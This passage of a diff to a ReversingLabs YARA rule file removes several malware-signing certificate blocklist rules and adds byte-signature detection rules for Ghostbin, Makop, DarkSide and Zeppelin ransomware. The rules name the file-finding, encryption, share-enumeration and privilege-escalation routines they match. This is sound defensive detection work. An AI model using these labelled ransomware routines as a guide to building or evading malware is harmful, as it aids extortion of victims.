+            75 ?? 89 75 ?? C6 45 ?? ?? 89 75 ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? C6 45 ?? ?? 8D
+            85 ?? ?? ?? ?? 8B 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 75 ?? FF 76 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? EB ??
+            8B 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 06 F0 FF 08 C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ??
+            ?? EB ?? 57 FF 15 ?? ?? ?? ?? 8B 75
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REBROSE LEISURE LIMITED" and pe.signatures [ i ] . serial == "76:74:36:92:1b:26:98:bd:18:40:0a:24:b0:13:41:b6" and 1556284480 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $enum_shares_p* ) ) and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_3E795531B3265510F935187Eca59920A : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Ghostbin : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Ghostbin ransomware."
 		author = "ReversingLabs"
-		id = "953434f4-cc19-5a0a-923b-4deaadacef00"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "4d576854-7a30-527d-9a7a-f22018183540"
+		date = "2021-09-06"
+		modified = "2021-09-06"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3176-L3192"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Ghostbin.yara#L1-L61"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d597e88314f9f20283b40058dd74167d0d72f7518277a57f26c15e44b670b386"
+		logic_hash = "3881e1c83ac2a31fdd8a081d3e6e6ea759771dbc183c3af9528930619bcddf9e"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ghostbin"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$setup_env = {
+            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 06 07 9A 0C
+            08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 16 18 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 16
+            28 ?? ?? ?? ?? 2C ?? 08 6F ?? ?? ?? ?? 19 FE 01 08 6F ?? ?? ?? ?? 18 FE 01 60 2C ?? 08
+            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 07 17 D6 0B 07 06 8E 69 32 ?? 00 72 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 2C ?? 16 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ??
+            ?? DE ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 1F ?? 16 28 ?? ?? ?? ?? 26 DE ?? 28 ?? ?? ?? ?? 28 ?? ??
+            ?? ?? DE ?? 2A
+        }
+		$encrypt_files = {
+            73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 25 6F ?? ?? ?? ?? 25 06 28 ?? ?? ?? ?? 03 6F ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 17 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 0C 6F ?? ?? ??
+            ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 0B 07 8E 69 17 59 1F ?? 58 17 58 8D ?? ?? ?? ?? 0D 08
+            09 1F ?? 28 ?? ?? ?? ?? 07 16 09 1F ?? 07 8E 69 28 ?? ?? ?? ?? 09 2A
+        }
+		$find_files = {
+            02 17 8D ?? ?? ?? ?? 25 16 1F ?? 9D 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 28
+            ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? ?? ?? ?? 39 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 0A 16 0B
+            2B ?? 06 07 9A 0C 7E ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2C ?? 08 28 ?? ?? ??
+            ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 08 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ??
+            ?? ?? ?? 08 28 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ?? DE ?? 07 17 D6 0B
+            07 06 8E 69 32 ?? 02 28 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 11 ?? 11 ?? 9A 28 ?? ?? ?? ??
+            11 ?? 17 D6 13 ?? 11 ?? 11 ?? 8E 69 32 ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ??
+            DE ?? 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "sasha catering ltd" and pe.signatures [ i ] . serial == "3e:79:55:31:b3:26:55:10:f9:35:18:7e:ca:59:92:0a" and 1557243644 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $setup_env ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_8F40B1485309A064A28B96Bfa3F55F36 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Makop : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Makop ransomware."
 		author = "ReversingLabs"
-		id = "bad5b57e-185a-5872-9817-a7d688e24fe7"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "9b7d42f3-0417-5228-8b25-244224cbc414"
+		date = "2020-10-30"
+		modified = "2020-10-30"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3194-L3212"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Makop.yara#L1-L99"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "58dd47bfd2acd698bc27fb03eb51e4b8598ef6c71f7193e3cc4eea63982855f0"
+		logic_hash = "0ff4739d32b4a775d07a5f22d551ed67025681d4986e4404c9a01ad4078468f3"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Makop"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            8D 54 24 ?? 52 56 FF 15 ?? ?? ?? ?? 56 8B F8 6A ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 5F 5E 5B 8B E5 5D C3 33 F6 89 74 24 ?? EB ?? 8D A4 24 ?? ?? ?? ?? 8D 64 24 ??
+            66 8B 44 24 ?? 66 85 C0 0F 84 ?? ?? ?? ?? 66 3D ?? ?? 75 ?? 66 8B 44 24 ?? 66 85 C0
+            0F 84 ?? ?? ?? ?? 66 3D ?? ?? 75 ?? 66 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ??
+            EB ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 8D 54 24 ?? 2B C2 D1 F8 83
+            E8 ?? 85 F6 8B F8 89 7C 24 ?? 75 ?? 8B 45 ?? 05 ?? ?? ?? ?? 03 C0 0F 84 ?? ?? ?? ??
+            50 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 89 44 24 ?? 8B F0 0F 84 ?? ?? ??
+            ?? F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 38 85 FF 74 ?? 8B 1F 8D 54 24
+            ?? 8B CA 2B D9 8D 49 ?? 0F B7 04 13 66 3D ?? ?? 72 ?? 66 3D ?? ?? 77 ?? 83 C0 ?? 0F
+            B7 C8 0F B7 02 66 3D ?? ?? 72 ?? 66 3D ?? ?? 77 ?? 83 C0 ?? 83 C2 ?? 66 85 C9 0F B7
+            C0 74 ?? 66 3B C8 74 ?? 0F B7 D0 0F B7 C1 2B C2 0F 84 ?? ?? ?? ?? 8B 7F ?? 85 FF 75
+            ?? 8B 7D ?? 8B 55 ?? 81 C7 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8B 4D ?? 8D 5C 4E ?? BA
+            ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 1C 56 8D 54 24 ?? BF ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4D ?? 8D 54 08 ?? 8B 45 ?? 52 56 50 E8
+        }
+		$find_files_p2 = {
+            83 C4 ?? E9 ?? ?? ?? ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ??
+            80 79 ?? ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 03 FA 81 FF ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B
+            15 ?? ?? ?? ?? C6 44 24 ?? ?? 8B 7D ?? 81 C7 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8A 44
+            24 ?? 84 C0 75 ?? 8B 55 ?? 83 C7 ?? 8D 5E ?? E8 ?? ?? ?? ?? 8A 44 24 ?? 8A C8 8B 54
+            24 ?? F6 D9 1B C9 83 E1 ?? F6 D8 8B F1 8D BE ?? ?? ?? ?? 1B C0 83 E0 ?? 83 C0 ?? 03
+            45 ?? 8D 04 42 89 44 24 ?? 8D 58 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 8D BE
+            ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 85 D2 8B 74 24 ?? 8B 45 ?? 77 ??
+            3B 70 ?? 77 ?? B1 ?? EB ?? 8B 55 ?? C6 44 24 ?? ?? E9 ?? ?? ?? ?? 32 C9 88 48 ?? 8B
+            4C 24 ?? F6 C1 ?? 74 ?? C6 40 ?? ?? 89 48 ?? EB ?? C6 40 ?? ?? 50 89 50 ?? 89 70 ??
+            8B 44 24 ?? 50 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 6A ??
+            50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 8B 74 24 ?? EB ?? 56 6A ?? FF 15
+            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 56 6A ?? FF 15 ??
+            ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files = {
+            8B 50 ?? 8B 00 83 EC ?? 55 8B 2D ?? ?? ?? ?? 56 57 6A ?? 8B F9 8D 4C 24 ?? 51 52 50
+            53 FF D5 85 C0 0F 84 ?? ?? ?? ?? 8B 57 ?? 8B 47 ?? 33 F6 56 8D 4C 24 ?? 51 52 50 53
+            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 75 ?? B0 ?? 5F 5E 5D 83
+            C4 ?? C3 3B 47 ?? 73 ?? 8B C8 83 E1 ?? 74 ?? BE ?? ?? ?? ?? 2B F1 8B 4F ?? 56 03 C8
+            6A ?? 51 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8B 4F ?? 03 C6 50 8D 54 24 ?? 52 51 6A
+            ?? 6A ?? 89 44 24 ?? 8B 44 24 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            8B 4C 24 ?? 8B 54 24 ?? 6A ?? 6A ?? 51 52 53 FF D5 85 C0 74 ?? 8B 4C 24 ?? 8B 57 ??
+            8B 3D ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 03 CE 51 52 53 FF D7 85 C0 74 ?? 8B 44 24 ??
+            8D 0C 30 8B 44 24 ?? 3B C1 72 ?? 01 44 24 ?? 8B 44 24 ?? 8B 50 ?? 8B 00 83 54 24 ??
+            ?? 6A ?? 6A ?? 52 50 53 FF D5 85 C0 74 ?? 6A ?? 8D 4C 24 ?? 51 6A ?? 8D 54 24 ?? 52
+            53 FF D7 85 C0 74 ?? 83 7C 24 ?? ?? 0F 83 ?? ?? ?? ?? 5F 5E 32 C0 5D 83 C4 ?? C3
+        }
+		$enum_network_resources = {
+            55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 68 ?? ?? ?? ?? 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
+            8B F0 85 F6 89 74 24 ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 7D ?? 8D 44 24 ?? 50 51 6A ??
+            6A ?? 57 E8 ?? ?? ?? ?? 85 C0 74 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B
+            7D ?? 68 ?? ?? ?? ?? 6A ?? 56 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 8D 54 24 ?? 52 56 8D 44 24 ?? 50 51 E8 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 85 C0 75 ?? 8B 54 24 ?? 8B 45 ?? 52 50 EB ?? 8B 4C 24
+            ?? 8B 50 ?? 51 52 E8 ?? ?? ?? ?? 33 DB 83 C4 ?? 39 5C 24 ?? 76 ?? 83 C6 ?? 8D 49 ??
+            8B 46 ?? 85 C0 8B C8 75 ?? B9 ?? ?? ?? ?? 8B 46 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 51 8B
+            0E 51 50 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ?? A8 ?? 74 ?? 8B 56 ?? 85 D2 74 ?? 85 FF 7E
+            ?? 8B 45 ?? 85 C0 74 ?? 8B 40 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 55 ?? 8B 4D ?? 52 83
+            EF ?? 57 8D 46 ?? 50 51 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? F6 06 ?? 74 ?? 50 E8 ?? ?? ??
+            ?? 8B 56 ?? 8B 45 ?? 83 C4 ?? 52 50 E8 ?? ?? ?? ?? 83 C3 ?? 83 C6 ?? 3B 5C 24 ?? 0F
+            82 ?? ?? ?? ?? 8B 74 24 ?? E9 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 8B 44 24 ?? 85 C0 74 ?? 50 E8 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Singh Agile Content Design Limited" and ( pe.signatures [ i ] . serial == "00:8f:40:b1:48:53:09:a0:64:a2:8b:96:bf:a3:f5:5f:36" or pe.signatures [ i ] . serial == "8f:40:b1:48:53:09:a0:64:a2:8b:96:bf:a3:f5:5f:36" ) and 1542585600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $enum_network_resources ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B2120Facadbb92Cc0A176759604C6A0F : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Darkside : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects DarkSide ransomware."
 		author = "ReversingLabs"
-		id = "8a90cc61-4d39-58eb-a102-c22d096d99ae"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "061b00cb-9b70-521f-ab3f-7e6b3c129194"
+		date = "2021-05-17"
+		modified = "2021-05-17"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3214-L3232"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.DarkSide.yara#L1-L94"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "08462b1bd3d45824aeea901a4db19365c28d8b8b0f594657df7a59250111729b"
+		logic_hash = "128af9a1b143e4b0928dd2b243e69497be906175f44815cc5703f17cce48ec9d"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DarkSide"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLON LTD" and ( pe.signatures [ i ] . serial == "00:b2:12:0f:ac:ad:bb:92:cc:0a:17:67:59:60:4c:6a:0f" or pe.signatures [ i ] . serial == "b2:12:0f:ac:ad:bb:92:cc:0a:17:67:59:60:4c:6a:0f" ) and 1554249600 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_4F407Eb50803845Cc43937823E1344C0 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "6989cda1-f28e-58b7-8572-a7dc2e84d9e3"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3234-L3250"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "4d5a2b0619be902d8a437f204ae1b87222c73d3186930809b1f694bad429aea8"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$find_files_v1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ??
+            83 7D ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 04 45 ?? ?? ??
+            ?? 50 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ??
+            ?? FF 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 8D 85 ??
+            ?? ?? ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8D 9D ?? ??
+            ?? ?? 83 3B ?? 74 ?? 81 3B ?? ?? ?? ?? 74 ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8D 85 ?? ??
+            ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 83 7D ??
+            ?? 74 ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 5F 5E 5A 59 5B
+            8B E5 5D C2
+        }
+		$enumerate_drives = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 8B D8 85 DB 74 ?? C1 EB ?? 8D B5 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 F8
+            ?? 74 ?? 83 F8 ?? 75 ?? 56 E8 ?? ?? ?? ?? 8D 76 ?? 4B 85 DB 75 ?? 5F 5E 5A 59 5B 8B
+            E5 5D C3 55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8
+            ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? C7
+            00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4
+            ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 A9 ?? ?? 74 ?? 6A ?? 8D 85 ?? ??
+            ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 40 ?? 50 FF 15 ?? ?? ??
+            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15
+            ?? ?? ?? ?? 85 C0 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2
+        }
+		$escalate_privileges = {
+            55 8B EC 83 C4 ?? 53 51 52 56 57 8D 45 ?? 50 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F
+            85 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75
+            ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8D 45 ?? 50
+            FF 75 ?? FF 75 ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? AD 8B F8 83
+            7E ?? ?? 74 ?? C7 46 ?? ?? ?? ?? ?? 83 C6 ?? 4F 85 FF 75 ?? 6A ?? 6A ?? 6A ?? FF 75
+            ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? FF 75 ?? FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C3
+        }
+		$enumerate_netshare = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 7D ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 6A ??
+            8D 45 ?? 50 6A ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 75 ?? 83 7E ?? ?? 75 ?? 68 ??
+            ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 C7 03 ?? ?? ?? ?? C7 43 ??
+            ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 8D 47 ?? 50 53 FF 15 ?? ?? ??
+            ?? 83 C4 ?? 53 FF 15 ?? ?? ?? ?? FF 36 53 FF 15 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ??
+            ?? 53 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 C6 ?? FF 4D ?? 83 7D ?? ?? 75 ??
+            FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2
+        }
+		$find_files_v2 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 51 52 56 57 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D BD
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ??
+            83 C4 ?? 66 83 7C 47 ?? ?? 74 ?? 66 C7 04 47 ?? ?? 83 C7 ?? C7 04 47 ?? ?? ?? ?? C7
+            44 47 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 85 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 66 A9 ?? ?? 74 ??
+            8D 9D ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 83 C4
+            ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 83 C0 ?? 53 50 FF 15 ?? ?? ?? ?? 83 C4 ?? 56
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 5F 5E 5A 59 5B 8B E5 5D C2
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLOW COOKED VENTURES LTD" and pe.signatures [ i ] . serial == "4f:40:7e:b5:08:03:84:5c:c4:39:37:82:3e:13:44:c0" and 1556555362 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( $find_files_v1 and $enumerate_drives and $escalate_privileges ) or ( $find_files_v2 and $enumerate_netshare ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_6922Bb5De88E4127E1Ac6969E6A199F5 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Zeppelin : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Zeppelin ransomware."
 		author = "ReversingLabs"
-		id = "86e16068-8b0b-5f0f-af5e-5ee9f518a915"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "f5cf514d-4dd0-58b7-82d0-5cb516a139a3"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3252-L3268"
